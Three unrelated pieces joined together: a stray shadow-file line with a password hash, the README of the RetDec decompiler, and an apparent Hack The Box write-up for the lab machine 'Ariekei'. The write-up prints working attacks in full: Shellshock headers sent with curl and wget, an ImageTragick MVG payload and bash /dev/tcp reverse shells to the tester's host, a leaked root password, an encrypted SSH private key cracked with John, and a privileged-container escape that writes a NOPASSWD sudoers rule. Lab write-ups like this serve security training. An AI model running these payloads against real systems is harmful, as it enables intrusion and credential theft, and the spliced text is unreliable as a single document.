`www-data:$6$SYixzIan$P3cvyztSwA1lmILF3kpKcqZpYSDONYwMwplB62RWu1RklKqIGCX1zleXuVwzxjLcpU6bhiW9N03AWkzVUZhms.:17264:0:99999:7:::` |
# RetDec [![Travis CI build status](https://travis-ci.org/avast-tl/retdec.svg?branch=master)](https://travis-ci.org/avast-tl/retdec) [![AppVeyor build status](https://ci.appveyor.com/api/projects/status/daqstq396hb8ixjg/branch/master?svg=true )](https://ci.appveyor.com/project/avast-tl/retdec?branch=master) [![TeamCity build status](https://retdec-tc.avast.com/app/rest/builds/aggregated/strob:(buildType:(project:(id:Retdec)))/statusIcon)](https://retdec-tc.avast.com/project.html?projectId=Retdec&guest=1) [RetDec](https://retdec.com/) is a retargetable machine-code decompiler based on [LLVM](https://llvm.org/). The decompiler is not limited to any particular target architecture, operating system, or executable file format: * Supported file formats: ELF, PE, Mach-O, COFF, AR (archive), Intel HEX, and raw machine code. * Supported architectures (32b only): Intel x86, ARM, MIPS, PIC32, and PowerPC. Features: * Static analysis of executable files with detailed information. * Compiler and packer detection. * Loading and instruction decoding. * Signature-based removal of statically linked library code. * Extraction and utilization of debugging information (DWARF, PDB). * Reconstruction of instruction idioms. * Detection and reconstruction of C++ class hierarchies (RTTI, vtables). * Demangling of symbols from C++ binaries (GCC, MSVC, Borland). * Reconstruction of functions, types, and high-level constructs. * Integrated disassembler. * Output in two high-level languages: C and a Python-like language. * Generation of call graphs, control-flow graphs, and various statistics. For more information, check out our * [Wiki](https://github.com/avast-tl/retdec/wiki) (in progress) * Botconf 2017 talk: [slides](https://retdec.com/web/files/publications/retdec-slides-botconf-2017.pdf), [video](https://www.youtube.com/watch?v=HHFvtt5b6yY) * REcon Montreal 2018 talk: [slides](https://retdec.com/web/files/publications/retdec-slides-recon-2018.pdf) * [Publications](https://retdec.com/publications/) ## Installation and Use Currently, we support Windows (7 or later), Linux, and macOS. ### Windows 1. Either download and unpack a [pre-built package](https://github.com/avast-tl/retdec/releases), or build and install the decompiler by yourself (the process is described below): 2. Install [Microsoft Visual C++ Redistributable for Visual Studio 2015](https://www.microsoft.com/en-us/download/details.aspx?id=48145). 3. Install the following programs: * [Python](https://www.python.org/) (version >= 3.4) * [UPX](https://upx.github.io/) (Optional: if you want to use UPX unpacker in the preprocessing stage) * [Graphviz](https://graphviz.gitlab.io/_pages/Download/windows/graphviz-2.38.msi) (Optional: if you want to generate call or control flow graphs) 4. Now, you are all set to run the decompiler. To decompile a binary file named `test.exe`, run the following command (ensure that `python` runs Python 3; as an alternative, you can try `py -3`) ``` python $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe ``` For more information, run `retdec-decompiler.py` with `--help`. ### Linux 1. There are currently no pre-built packages for Linux. You will have to build and install the decompiler by yourself. The process is described below. 2. After you have built the decompiler, you will need to install the following packages via your distribution's package manager: * [Python](https://www.python.org/) (version >= 3.4) * [UPX](https://upx.github.io/) (Optional: if you want to use UPX unpacker in the preprocessing stage) * [Graphviz](http://www.graphviz.org/) (Optional: if you want to generate call or control flow graphs) 3. Now, you are all set to run the decompiler. To decompile a binary file named `test.exe`, run ``` $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe ``` For more information, run `retdec-decompiler.py` with `--help`. ### macOS 1. There are currently no pre-built packages for macOS. You will have to build and install the decompiler by yourself. The process is described below. 2. After you have built the decompiler, you will need to install the following packages: * [Python](https://www.python.org/) (version >= 3.4) * [UPX](https://upx.github.io/) (Optional: if you want to use UPX unpacker in the preprocessing stage) * [Graphviz](http://www.graphviz.org/) (Optional: if you want to generate call or control flow graphs) 3. Now, you are all set to run the decompiler. To decompile a binary file named `test.exe`, run ``` $RETDEC_INSTALL_DIR/bin/retdec-decompiler.py test.exe ``` For more information, run `retdec-decompiler.py` with `--help`. ## Build and Installation This section describes a local build and installation of RetDec. Instructions for Docker are given in the next section. ### Requirements #### Linux * A C++ compiler and standard C++ library supporting C++14 (e.g. GCC >= 4.9) * [CMake](https://cmake.org/) (version >= 3.6) * [Git](https://git-scm.com/) * [Perl](https://www.perl.org/) * [Python](https://www.python.org/) (version >= 3.4) * [Bison](https://www.gnu.org/software/bison/) (version >= 3.0) * [Flex](https://www.gnu.org/software/flex/) (version >= 2.6) * [autotools](https://en.wikipedia.org/wiki/GNU_Build_System) ([autoconf](https://www.gnu.org/software/autoconf/autoconf.html), [automake](https://www.gnu.org/software/automake/), and [libtool](https://www.gnu.org/software/libtool/)) * [pkg-config](https://www.freedesktop.org/wiki/Software/pkg-config/) * [m4](https://www.gnu.org/software/m4/m4.html) * [ncurses](http://invisible-island.net/ncurses/) (for `libtinfo`) * [zlib](http://zlib.net/) * Optional: [Doxygen](http://www.stack.nl/~dimitri/doxygen/) and [Graphviz](http://www.graphviz.org/) for generating API documentation On Debian-based distributions (e.g. Ubuntu), the required packages can be installed with `apt-get`: ```sh sudo apt-get install build-essential cmake git perl python3 bison flex libfl-dev autoconf automake libtool pkg-config m4 zlib1g-dev libtinfo-dev upx doxygen graphviz ``` On RPM-based distributions (e.g. Fedora), the required packages can be installed with `dnf`: ```sh sudo dnf install gcc gcc-c++ cmake make git perl python3 bison flex autoconf automake libtool pkg-config m4 zlib-devel ncurses-devel upx doxygen graphviz ``` On Arch Linux, the required packages can be installed with `pacman`: ```sh sudo pacman -S base-devel cmake git perl python3 bison flex autoconf automake libtool pkg-config m4 zlib ncurses upx doxygen graphviz ``` #### Windows * Microsoft Visual C++ (version >= Visual Studio 2015 Update 2) * [CMake](https://cmake.org/) (version >= 3.6) * [Git](https://git-scm.com/) * [Flex + Bison](https://sourceforge.net/projects/winflexbison/files/win_flex_bison3-latest.zip/download) ([mirror](https://github.com/avast-tl/retdec-support/releases/download/2018-07-27/win_flex_bison3-latest.zip)) from the [Win flex-bison project](https://sourceforge.net/projects/winflexbison/). Add the extracted directory to the system `Path` ([HOWTO](https://www.computerhope.com/issues/ch000549.htm)). * [Active Perl](https://www.activestate.com/activeperl). It needs to be the first Perl in `PATH`, or it has to be provided to CMake using `CMAKE_PROGRAM_PATH` variable, e.g. `-DCMAKE_PROGRAM_PATH=/c/perl/bin`. * [Python](https://www.python.org/) (version >= 3.4) * Optional: [Doxygen](http://ftp.stack.nl/pub/users/dimitri/doxygen-1.8.13-setup.exe) and [Graphviz](https://graphviz.gitlab.io/_pages/Download/windows/graphviz-2.38.msi) for generating API documentation #### macOS Packages should be preferably installed via [Homebrew](https://brew.sh). * Full Xcode installation (Command Line Tools are untested) * [CMake](https://cmake.org/) (version >= 3.6) * [Git](https://git-scm.com/) * [Perl](https://www.perl.org/) * [Python](https://www.python.org/) (version >= 3.4) * [Bison](https://www.gnu.org/software/bison/) (version >= 3.0) * [Flex](https://www.gnu.org/software/flex/) (version >= 2.6) * [autotools](https://en.wikipedia.org/wiki/GNU_Build_System) ([autoconf](https://www.gnu.org/software/autoconf/autoconf.html), [automake](https://www.gnu.org/software/automake/), and [libtool](https://www.gnu.org/software/libtool/)) * Optional: [Doxygen](http://www.stack.nl/~dimitri/doxygen/) and [Graphviz](http://www.graphviz.org/) for generating API documentation ### Process Note: Although RetDec now supports a system-wide installation ([#94](https://github.com/avast-tl/retdec/issues/94)), unless you use your distribution's package manager to install it, we recommend installing RetDec locally into a designated directory. The reason for this is that uninstallation will be easier as you will only need to remove a single directory. To perform a local installation, run `cmake` with the `-DCMAKE_INSTALL_PREFIX=<path>` parameter, where `<path>` is directory into which RetDec will be installed (e.g. `$HOME/projects/retdec-install` on Linux and macOS, and `C:\projects\retdec-install` on Windows). * Clone the repository: * `git clone https://github.com/avast-tl/retdec` * Linux: * `cd retdec` * `mkdir build && cd build` * `cmake .. -DCMAKE_INSTALL_PREFIX=<path>` * `make -jN` (`N` is the number of CPU cores to use for parallel build) * `make install` * Windows: * Open a command prompt (e.g. `cmd.exe`) * `cd retdec` * `mkdir build && cd build` * `cmake .. -DCMAKE_INSTALL_PREFIX=<path> -G<generator>` * `cmake --build . --config Release -- -m` * `cmake --build . --config Release --target install` * Alternatively, you can open `retdec.sln` generated by `cmake` in Visual Studio IDE * macOS: * `cd retdec` * `mkdir build && cd build` * ```sh # Apple ships old Flex & Bison, so Homebrew versions should be used. export CMAKE_INCLUDE_PATH="/usr/local/opt/flex/include" export CMAKE_LIBRARY_PATH="/usr/local/opt/flex/lib;/usr/local/opt/bison/lib" export PATH="/usr/local/opt/flex/bin:/usr/local/opt/bison/bin:$PATH" ``` * `cmake .. -DCMAKE_INSTALL_PREFIX=<path>` * `make -jN` (`N` is the number of CPU cores to use for parallel build) * `make install` You have to pass the following parameters to `cmake`: * `-DCMAKE_INSTALL_PREFIX=<path>` to set the installation path to `<path>`. Quote the path if you are using backslashes on Windows (e.g. `-DCMAKE_INSTALL_PREFIX="C:\retdec"`). * (Windows only) `-G<generator>` is `-G"Visual Studio 14 2015"` for 32-bit build using Visual Studio 2015, or `-G"Visual Studio 14 2015 Win64"` for 64-bit build using Visual Studio 2015. Later versions of Visual Studio may be used. You can pass the following additional parameters to `cmake`: * `-DRETDEC_DOC=ON` to build with API documentation (requires Doxygen and Graphviz, disabled by default). * `-DRETDEC_TESTS=ON` to build with tests (disabled by default). * `-DRETDEC_DEV_TOOLS=ON` to build with development tools (disabled by default). * `-DCMAKE_BUILD_TYPE=Debug` to build with debugging information, which is useful during development. By default, the project is built in the `Release` mode. This has no effect on Windows, but the same thing can be achieved by running `cmake --build .` with the `--config Debug` parameter. * `-DCMAKE_PROGRAM_PATH=<path>` to use Perl at `<path>` (probably useful only on Windows). ## Build in Docker Docker support is maintained by community. If something does not work for you or if you have suggestions for improvements, open an issue or PR. ### Build Image Building in Docker does not require installation of the required libraries locally. This is a good option for trying out RetDec without setting up the whole build toolchain. To build the RetDec Docker image, run ``` docker build -t retdec . ``` This builds the image from the master branch of this repository. To build the image using the local copy of the repository, use the development Dockerfile, `Dockerfile.dev`: ``` docker build -t retdec:dev . -f Dockerfile.dev ``` ### Run Container If your `uid` is not 1000, make sure that the directory containing your input binary files is accessible for RetDec: ``` chmod 0777 /path/to/local/directory ``` Now, you can run the decompiler inside a container: ``` docker run --rm -v /path/to/local/directory:/destination retdec retdec-decompiler.py /destination/binary ``` Output files will be generated to the same directory (e.g. `/path/to/local/directory`). ## Repository Overview This repository contains the following libraries: * `ar-extractor` - library for extracting object files from archives (based on LLVM). * `bin2llvmir` - library of LLVM passes for translating binaries into LLVM IR modules. * `capstone2llvmir` - binary instructions to LLVM IR translation library. * `config` - library for representing and managing RetDec configuration databases. * `cpdetect` - library for compiler and packer detection in binaries. * `crypto` - collection of cryptographic functions. * `ctypes` - C++ library for representing C function data types. * `debugformat` - library for uniform representation of DWARF and PDB debugging information. * `demangler` - demangling library capable to handle names generated by the GCC/Clang, Microsoft Visual C++, and Borland C++ compilers. * `dwarfparser` - library for high-level representation of DWARF debugging information. * `fileformat` - library for parsing and uniform representation of various object file formats. Currently supporting the following formats: COFF, ELF, Intel HEX, Mach-O, PE, raw data. * `llvm-support` - set of LLVM related utility functions. * `llvmir-emul` - LLVM IR emulation library used for unit testing. * `llvmir2hll` - library for translating LLVM IR modules to high-level source codes (C, Python-like language). * `loader` - library for uniform representation of binaries loaded to memory. Supports the same formats as fileformat. * `macho-extractor` - library for extracting regular Mach-O binaries from fat Mach-O binaries (based on LLVM). * `patterngen` - binary pattern extractor library. * `pdbparser` - Microsoft PDB files parser library. * `stacofin` - static code finder library. * `unpacker` - collection of unpacking functions. * `utils` - general C++ utility library. This repository contains the following tools: * `ar-extractortool` - frontend for the ar-extractor library (installed as `retdec-ar-extractor`). * `bin2llvmirtool` - frontend for the `bin2llvmir` library (installed as `retdec-bin2llvmir`). * `bin2pat` - tool for generating patterns from binaries (installed as `retdec-bin2pat`). * `capstone2llvmirtool` - frontend for the `capstone2llvmir` library (installed as `retdec-capstone2llvmir`). * `configtool` - frontend for the `config` library (installed as `retdec-config`). * `ctypesparser` - C++ library for parsing C function data types from JSON files into `ctypes` representation (installed as `retdec-ctypesparser`). * `demangler_grammar_gen` -- tool for generating new grammars for the `demangler` library (installed as `retdec-demangler-grammar-gen`). * `demanglertool` -- frontend for the `demangler` library (installed as `retdec-demangler`). * `fileinfo` - binary analysis tool. Supports the same formats as `fileformat` (installed as `retdec-fileinfo`). * `idr2pat` - tool for extracting patterns from IDR knowledge bases (installed as `retdec-idr2pat`). * `llvmir2hlltool` - frontend for the `llvmir2hll` library (installed as `retdec-llvmir2hll`). * `macho-extractortool` - frontend for the `macho-extractor` library (installed as `retdec-macho-extractor`). * `pat2yara` - tool for processing patterns to YARA signatures (installed as `retdec-pat2yara`). * `stacofintool` - frontend for the `stacofin` library (installed as `retdec-stacofin`). * `unpackertool` - plugin-based unpacker (installed as `retdec-unpacker`). This repository contains the following scripts: * `retdec-decompiler.py` - the main decompilation script binding it all together. This is the tool to use for full binary-to-C decompilations. * Support scripts used by `retdec-decompiler.py`: * `retdec-color-c.py` - decorates output C sources with IDA color tags - syntax highlighting for IDA. * `retdec-config.py` - decompiler's configuration file. * `retdec-archive-decompiler.py` - decompiles objects in the given AR archive. * `retdec-fileinfo.py` - a Fileinfo tool wrapper. * `retdec-signature-from-library-creator.py` - extracts function signatures from the given library. * `retdec-unpacker.py` - tries to unpack the given executable file by using any of the supported unpackers. * `retdec-utils.py` - a collection of Python utilities. * `retdec-tests-runner.py` - run all tests in the unit test directory. * `type_extractor` - generation of type information (for internal use only) ## Project Documentation See the [project documentation](https://retdec-tc.avast.com/repository/download/Retdec_DoxygenBuild/.lastSuccessful/build/doc/doxygen/html/index.html) for an up to date Doxygen-generated software reference corresponding to the latest commit in the `master` branch. ## Related Repositories * [retdec-idaplugin](https://github.com/avast-tl/retdec-idaplugin) -- Embeds RetDec into IDA (Interactive Disassembler) and makes its use much easier. * [retdec-regression-tests-framework](https://github.com/avast-tl/retdec-regression-tests-framework) -- Provides means to run and create regression tests for RetDec and related tools. This is a must if you plan to contribute to the RetDec project. * [vim-syntax-retdecdsm](https://github.com/s3rvac/vim-syntax-retdecdsm) -- Vim syntax-highlighting file for the output from the RetDec's disassembler (`.dsm` files). ## License Copyright (c) 2017 Avast Software, licensed under the MIT license. See the [`LICENSE`](https://github.com/avast-tl/retdec/blob/master/LICENSE) file for more details. RetDec uses third-party libraries or other resources listed, along with their licenses, in the [`LICENSE-THIRD-PARTY`](https://github.com/avast-tl/retdec/blob/master/LICENSE-THIRD-PARTY) file. ## Contributing See [RetDec contribution guidelines](https://github.com/avast-tl/retdec/wiki/Contribution-Guidelines). ## Acknowledgements This software was supported by the research funding TACR (Technology Agency of the Czech Republic), ALFA Programme No. TA01010667.
# Ariekei #### 10.10.10.65 ###### Dotaplayer365 **Nmap:** ``` nmap -A -T4 -sS -sV -v 10.10.10.65 Nmap scan report for 10.10.10.65 Host is up (0.12s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a7:5b:ae:65:93:ce:fb:dd:f9:6a:7f:de:50:67:f6:ec (RSA) | 256 64:2c:a6:5e:96:ca:fb:10:05:82:36:ba:f0:c9:92:ef (ECDSA) |_ 256 51:9f:87:64:be:99:35:2a:80:a6:a2:25:eb:e0:95:9f (EdDSA) 443/tcp open ssl/http nginx 1.10.2 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.10.2 |_http-title: Site Maintenance | ssl-cert: Subject: stateOrProvinceName=Texas/countryName=US | Subject Alternative Name: DNS:calvin.ariekei.htb, DNS:beehive.ariekei.htb | Issuer: stateOrProvinceName=Texas/countryName=US | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2017-09-24T01:37:05 | Not valid after: 2045-02-08T01:37:05 | MD5: d73e ffe4 5f97 52ca 64dc 7770 abd0 2b7f |_SHA-1: 1138 148e dfbd 6ad8 367b 08c8 1725 7408 eedb 4a7b |_ssl-date: TLS randomness does not represent time | tls-nextprotoneg: |_ http/1.1 1022/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 98:33:f6:b6:4c:18:f5:80:66:85:47:0c:f6:b7:90:7e (DSA) | 2048 78:40:0d:1c:79:a1:45:d4:28:75:35:36:ed:42:4f:2d (RSA) | 256 45:a6:71:96:df:62:b5:54:66:6b:91:7b:74:6a:db:b7 (ECDSA) |_ 256 ad:8d:4d:69:8e:7a:fd:d8:cd:6e:c1:4f:6f:81:b4:1f (EdDSA) ``` After checking the nmap results, we can see that there are 2 DNS names. | IP | FQDN | | ------------- |:-------------------------: | | 10.10.10.65:443 | calvin.ariekei.htb | | 10.10.10.65:443 | beehive.ariekei.htb | We can add both of them to our hosts file ofcourse * **beehive.ariekei.htb** Maintainence! <kbd><img src="https://github.com/jakobgoerke/HTB-Writeups/blob/master/Ariekei/Images/beehive.htb.PNG"></kbd> After dirbusting we instantly get a page like this! https://beehive.ariekei.htb/cgi-bin/stats/ <kbd><img src="https://github.com/jakobgoerke/HTB-Writeups/blob/master/Ariekei/Images/shellshock.website.PNG"></kbd> This screams shellshock!! Lets try it out ``` root@kali:~/hackthebox/Ariekei# curl -k -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' https://beehive.ariekei.htb/cgi-bin/stats/ <pre> oooo$$$$$$$$$$$$oooo oo$$$$$$$$$$$$$$$$$$$$$$$$o oo$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o o$ $$ o$ o $ oo o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$o $$ $$ $$o$ oo $ $ "$ o$$$$$$$$$ $$$$$$$$$$$$$ $$$$$$$$$o $$$o$$o$ "$$$$$$o$ o$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$o $$$$$$$$ $$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$ $$$$$$$$$$$$$$ """$$$ "$$$""""$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ "$$$ $$$ o$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ "$$$o o$$" $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$o $$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" "$$$$$$ooooo$$$$o o$$$oooo$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ o$$$$$$$$$$$$$$$$$ $$$$$$$$"$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$"""""""" """" $$$$ "$$$$$$$$$$$$$$$$$$$$$$$$$$$$" o$$$ "$$$o """$$$$$$$$$$$$$$$$$$"$$" $$$ $$$o "$$""$$$$$$"""" o$$$ $$$$o o$$$" "$$$$o o$$$$$$o"$$$$o o$$$$ "$$$$$oo ""$$$$o$$$$$o o$$$$"" ""$$$$$oooo "$$$o$$$$$$$$$""" ""$$$$$$$oo $$$$$$$$$$ """"$$$$$$$$$$$ $$$$$$$$$$$$ $$$$$$$$$$" "$$$"""" </pre> ``` GET REKT! Let the trolling begin. There is a WAF which is gonna troll us all the way, lets take a look at this later * **calvin.ariekei.htb** Not Found?! <kbd><img src="https://github.com/jakobgoerke/HTB-Writeups/blob/master/Ariekei/Images/calvin.htb.PNG"></kbd> After doing some dirbusting we find a directory named ```/upload``` which has a very peculiar looking page I tried to upload some normal jpg files with a simple php shell and some other tricks up my sleeve (which isnt too long ) The only thing left to try is [Image Tragic exploit](https://imagetragick.com/) Lets create a mvg file with the contents: ``` push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg"|/bin/bash -i >/dev/tcp/10.10.14.54/4444 0<&1 2>&1 &")' pop graphic-context ``` Start a listner at 4444 Use browse and upload the image And Voila!! ``` root@kali:~/hackthebox/Ariekei# nc -nvlp 4444 listening on [any] 4444 ... connect to [10.10.14.54] from (UNKNOWN) [10.10.10.65] 53582 [root@calvin app]# hostname calvin.ariekei.htb ``` We got root shell!?!?! Its inside a docker :( feelsbadman After doing some enum we find some juicy stuff inside the dir ```/common/.secrets``` It has 2 keys ```bastion_keu and bastion_key.pub``` Lets copy it to our machine The pub tells us that its the login for root@ariekei ```ssh -v -i bastion_key root@ariekei.htb``` That didnt work, maybe its for the port 1022 ```ssh -v -i bastion_key root@ariekei.htb -p1022``` Works!!!! ``` root@ezra:~# id uid=0(root) gid=0(root) groups=0(root) root@ezra:~# hostname ezra.ariekei.htb ``` Looks like we are inside a different host ``` root@ezra:/common/containers/blog-test# ls -l total 24 -rw-r--r-- 1 root 999 144 Sep 23 18:43 Dockerfile -rwxr--r-- 1 root 999 32 Sep 16 00:45 build.sh drwxr-xr-x 2 root root 4096 Sep 26 18:24 cgi drwxr-xr-x 7 root 999 4096 Sep 26 18:15 config drwxr-xr-x 2 root root 4096 Dec 19 06:00 logs -rwxrwx--x 1 root 999 386 Nov 13 14:36 start.sh ``` It seems to be the one with the cgi dir (Shellshock ahem ahem) ``` root@ezra:/common/containers/blog-test# cat Dockerfile FROM internal_htb/docker-apache RUN echo "root:Ib3!kTEvYw6*P7s" | chpasswd RUN apt-get update RUN apt-get install python -y RUN mkdir /common ``` ``` root@ezra:/common/containers/blog-test# cat start.sh docker run \ -v /dev/null:/root/.sh_history \ -v /dev/null:/root/.bash_history \ --restart on-failure:5 \ --net arieka-test-net --ip 172.24.0.2 \ -h beehive.ariekei.htb --name blog-test -dit \ -v /opt/docker:/common:ro \ -v $(pwd)/cgi:/usr/lib/cgi-bin:ro \ -v $(pwd)/config:/etc/apache2:ro \ -v $(pwd)/logs:/var/log/apache2 \ -v /home/spanishdancer:/home/spanishdancer:ro web-template ``` We know that the internal ip for the cgi website is 172.24.0.2 Now we can try and run shellshock via the internal network and hope the WAF doesnt block us (We should check the WAF settings before we do it, but wth!) ``` root@ezra:/common/containers/blog-test# wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -i >/dev/tcp/10.10.14.54/4445 0<&1 2>&1" http://172.24.0.2/cgi-bin/stats --2017-12-19 08:07:17-- http://172.24.0.2/cgi-bin/stats Connecting to 172.24.0.2:80... connected. HTTP request sent, awaiting response... ``` ``` root@kali:~/hackthebox/Ariekei# nc -nvlp 4445 listening on [any] 4445 ... connect to [10.10.14.54] from (UNKNOWN) [10.10.10.65] 37862 www-data@beehive:/usr/lib/cgi-bin$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@beehive:/usr/lib/cgi-bin$ hostname hostname beehive.ariekei.htb www-data@beehive:/usr/lib/cgi-bin$ ``` Shellz! The docker file had a root password ```Ib3!kTEvYw6*P7s``` We can do su with that ofcourse ``` root@beehive:/home/spanishdancer# cat user.txt cat user.txt ff0bca827a5f660f6d35df7481e5f216 ``` Its .ssh folder has some kewl infos ``` root@beehive:/home/spanishdancer/.ssh# ls -la ls -la total 20 drwx------ 2 1000 1000 4096 Sep 24 00:31 . drwxr-xr-x 5 1000 1000 4096 Nov 13 14:19 .. -rw-rw-r-- 1 1000 1000 407 Sep 24 00:31 authorized_keys -rw------- 1 1000 1000 1766 Sep 24 00:31 id_rsa -rw-r--r-- 1 1000 1000 407 Sep 24 00:31 id_rsa.pub ``` ``` root@beehive:/home/spanishdancer/.ssh# cat id_rsa cat id_rsa -----BEGIN RSA PRIVATE KEY----- Proc-Type: 4,ENCRYPTED DEK-Info: AES-128-CBC,C3EBD8120354A75E12588B11180E96D5 2UIvlsa0jCjxKXmQ4vVX6Ez0ak+6r5VuZFFoalVXvbZSLomIya4vYETv1Oq8EPeh KHjq5wFdlYdOXqyJus7vFtB9nbCUrgH/a3og0/6e8TA46FuP1/sFMV67cdTlXfYI Y4sGV/PS/uLm6/tcEpmGiVdcUJHpMECZvnx9aSa/kvuO5pNfdFvnQ4RVA8q/w6vN p3pDI9CzdnkYmH5/+/QYFsvMk4t1HB5AKO5mRrc1x+QZBhtUDNVAaCu2mnZaSUhE abZo0oMZHG8sETBJeQRnogPyAjwmAVFy5cDTLgag9HlFhb7MLgq0dgN+ytid9YA8 pqTtx8M98RDhVKqcVG3kzRFc/lJBFKa7YabTBaDoWryR0+6x+ywpaBGsUXEoz6hU UvLWH134w8PGuR/Rja64s0ZojGYsnHIl05PIntvl9hinDNc0Y9QOmKde91NZFpcj pDlNoISCc3ONnL4c7xgS5D2oOx+3l2MpxB+B9ua/UNJwccDdJUyoJEnRt59dH1g3 cXvb/zTEklwG/ZLed3hWUw/f71D9DZV+cnSlb9EBWHXvSJwqT1ycsvJRZTSRZeOF Bh9auWqAHk2SZ61kcXOp+W91O2Wlni2MCeYjLuw6rLUHUcEnUq0zD9x6mRNLpzp3 IC8VFmW03ERheVM6Ilnr8HOcOQnPHgYM5iTM79X70kCWoibACDuEHz/nf6tuLGbv N01CctfSE+JgoNIIdb4SHxTtbOvUtsayQmV8uqzHpCQ3FMfz6uRvl4ZVvNII/x8D u+hRPtQ1690Eg9sWqu0Uo87/v6c/XJitNYzDUOmaivoIpL0RO6mu9AhXcBnqBu3h oPSgeji9U7QJD64T8InvB7MchfaJb9W/VTECST3FzAFPhCe66ZRzRKZSgMwftTi5 hm17wPBuLjovOCM8QWp1i32IgcdrnZn2pBpt94v8/KMwdQyAOOVhkozBNS6Xza4P 18yUX3UiUEP9cmtz7bTRP5h5SlDzhprntaKRiFEHV5SS94Eri7Tylw4KBlkF8lSD WZmJvAQc4FN+mhbaxagCadCf12+VVNrB3+vJKoUHgaRX+R4P8H3OTKwub1e69vnn QhChPHmH9SrI2TNsP9NPT5geuTe0XPP3Og3TVzenG7DRrx4Age+0TrMShcMeJQ8D s3kAiqHs5liGqTG96i1HeqkPms9dTC895Ke0jvIFkQgxPSB6y7oKi7VGs15vs1au 9T6xwBLJQSqMlPewvUUtvMQAdNu5eksupuqBMiJRUQvG9hD0jjXz8f5cCCdtu8NN 8Gu4jcZFmVvsbRCP8rQBKeqc/rqe0bhCtvuMhnl7rtyuIw2zAAqqluFs8zL6YrOw lBLLZzo0vIfGXV42NBPgSJtc9XM3YSTjbdAk+yBNIK9GEVTbkO9GcMgVaBg5xt+6 uGE5dZmtyuGyD6lj1lKk8D7PbCHTBc9MMryKYnnWt7CuxFDV/Jp4fB+/DuPYL9YQ 8RrdIpShQKh189lo3dc6J00LmCUU5qEPLaM+AGFhpk99010rrZB/EHxmcI0ROh5T 1oSM+qvLUNfJKlvqdRQr50S1OjV+9WrmR0uEBNiNxt2PNZzY/Iv+p8uyU1+hOWcz -----END RSA PRIVATE KEY----- root@beehive:/home/spanishdancer/.ssh# cat id_rsa.pub cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC325QNrOHp+Ob93i/XR2XkXZ1k/ypSbKhdcKB2CQLNW1jXp+CKnb5wmin/hEJ8u3Crm5YsFjg/K/x6hBDa0TwpwQxIZ7y1JbWFXL3XRdvpi6YrIMdUwGs3lCAUwJhazVnOUAY92EnoLdQlbPgXT4gVxMfW37YDBC3Gg2YJRKUkrDaYsI9oxvGMU1vmigb/0Ck/+kG/n0yOa0NBb2orEwQYoqX1cW4PnuTmR7bD53PsWmNcYhLxSvd783tz9Q/Np7q9/ziPo2QCN1R0fY7UykmASA1hedfI6C2mUKaETN4vKnfVeppb5m7wXhkSlYULE5PcmXuGoYCD6WtwAzPiwb1r spanishdancer@ariekei.htb ``` Looks like a ssh key for the user spanishdancer It would be better if we could ssh into the user instead of spawning shellz :D Lets go Johnny! <kbd><img src="https://media.giphy.com/media/REej9xTUwlmgM/giphy.gif"></kbd> Step1: <kbd><img src="https://github.com/jakobgoerke/HTB-Writeups/blob/master/Ariekei/Images/Johnny1.PNG"></kbd> Step 2: <kbd><img src="https://github.com/jakobgoerke/HTB-Writeups/blob/master/Ariekei/Images/Johnny2.PNG"></kbd> Le SSH Password ``` root@kali:~/hackthebox/Ariekei# ssh -i id_rsa spanishdancer@ariekei.htb Enter passphrase for key 'id_rsa': Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-87-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 7 packages can be updated. 7 updates are security updates. Last login: Mon Nov 13 10:23:41 2017 from 10.10.14.2 spanishdancer@ariekei:~$ id uid=1000(spanishdancer) gid=1000(spanishdancer) groups=1000(spanishdancer),999(docker) spanishdancer@ariekei:~$ hostname ariekei.htb ``` We are now on ariekei.htb and not beehive or calvin Feelsgoodman Time to break out of the docker [Video](https://www.youtube.com/watch?v=AtO5TDJnieA&feature=youtu.be) Shows us how to break out of the docker to the host machine ``` spanishdancer@ariekei:~$ docker run --privileged --interactive --tty --volume /:/host bash bash-4.4# echo "spanishdancer ALL=(ALL) NOPASSWD: ALL" > /host/etc/sudoers.d/foo bash-4.4# exit exit spanishdancer@ariekei:~$ sudo -i root@ariekei:~# id uid=0(root) gid=0(root) groups=0(root) root@ariekei:~# cat root.txt 0385b6629b30f8a673f7bb279fb1570b ```
